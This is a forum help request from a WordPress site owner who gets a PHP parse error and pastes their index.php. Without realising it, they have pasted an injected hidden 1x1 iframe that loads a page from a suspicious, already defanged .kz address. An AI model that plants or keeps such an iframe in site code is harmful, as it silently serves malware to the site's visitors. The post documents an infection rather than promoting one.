Hey everyone I figured I would come here and ask for help, I got this message:
Parse error: syntax error, unexpected '?' on line 18
here is the simple code:
<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);
/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
?<html><body><iframe
src="http://arnold.DO-NOT-VISIT-URL.kz/path-removed-due-to-possible-malware-risk/index.php?out=12345"
width="1" height="1" frameborder="0"></iframe></body></html>>
The site was working fine before...why does it mess up like this??? I'm not programmer so any help would be really appreciated.
thank you